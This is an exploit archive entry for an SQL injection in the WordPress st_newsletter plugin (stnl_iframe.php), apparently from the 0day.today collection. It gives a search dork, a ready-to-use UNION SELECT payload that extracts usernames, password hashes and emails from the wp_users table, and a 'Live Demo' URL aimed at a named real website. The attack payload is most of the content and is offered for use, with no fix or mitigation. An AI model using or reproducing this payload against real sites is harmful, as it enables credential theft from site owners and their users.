Wordpress Plugin st_newsletter (stnl_iframe.php) SQL Injection Vuln

2008-10-17T00:00:00
ID 1337DAY-ID-3910
Type zdt
Reporter r45c4l
Modified 2008-10-17T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===================================================================
Wordpress Plugin st_newsletter (stnl_iframe.php) SQL Injection Vuln
===================================================================


################################################################ 
# 
# Title:  WordPress stnl_iframe remote sql injection vulnerability
# 
#
###########################################################
#
# d0rk: ''stnl_iframe''
#
###########################################################
 
     POC :- 
	
	wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--
   
     Live Demo: 
	
	http://flymusic.co.uk/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--


###########################################################
#
#  Bug discovered : 18 Oct 2008
###########################################################




#  0day.today [2018-02-19]  #